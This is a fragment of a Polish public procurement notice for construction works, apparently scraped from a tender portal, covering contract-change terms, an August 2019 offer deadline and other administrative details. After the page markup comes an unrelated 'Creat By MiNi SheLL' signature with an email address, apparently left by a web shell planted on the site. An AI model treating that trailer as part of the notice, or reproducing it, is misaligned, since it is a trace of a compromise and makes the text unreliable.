udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiana umowy dokonana z naruszeniem art. 144 ust. 1 ustawy Prawo zamówień publicznychpodlega unieważnieniu. 2. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksusporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. 3. W przypadkachprzewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego 4. Zmiany wumowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 5. Zmiany umowy niemogą wykraczać poza zakres świadczenia określony w Specyfikacji istotnych warunków zamówienia.6. Zmiany umowy mogą dotyczyć: 1) zmiany jakości lub innych parametrów charakterystycznych dlaobjętego proponowaną zmianą elementu robót budowlanych, 2) aktualizacji rozwiązań projektowych zuwagi na postęp technologiczny, 3) zmiany producenta materiałów, 4) zmiany wymiarów, położenialub wysokości części robót budowlanych. 7. Jeżeli zmiana, o której mowa w ust. 6, wymaga zmianylub wykonania dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót,strona inicjująca przedstawia projekt zamienny lub wykonuje projekt zawierający opis proponowanych zmian wraz z informacją - o konieczności lub nie - zmiany zgłoszenia lub uzyskania pozwolenia nabudowę oraz przedmiar i niezbędne rysunki. Projekt taki wymaga akceptacji projektanta izatwierdzenia do realizacji przez Zamawiającego. 8. Warunkiem dokonania zmian o których mowa wust. 6 jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: 1) opis propozycji zmian 2)uzasadnienie zmiany 3) opis wpływu zmian na termin wykonania umowy 9. Zmiany, o których mowaw ust. 6 mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności: 1)poprawa wartości lub podniesienie sprawności ukończonych robót budowlanych; 2) zmianaobowiązujących przepisów; 3) podniesienie trwałości obiektu; 4) podniesienie bezpieczeństwawykonywanie robót; 5) opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowaneprzez lub dające się przypisać Zamawiającemu; 6) zaistnienia nieprzewidzianych w umowiewarunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunkówklimatycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy naprzewidzianych w niej warunkach; 7) siła wyższa. 10. Przewiduje się również możliwość zmianyterminu realizacji przedmiotu umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-08-30</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com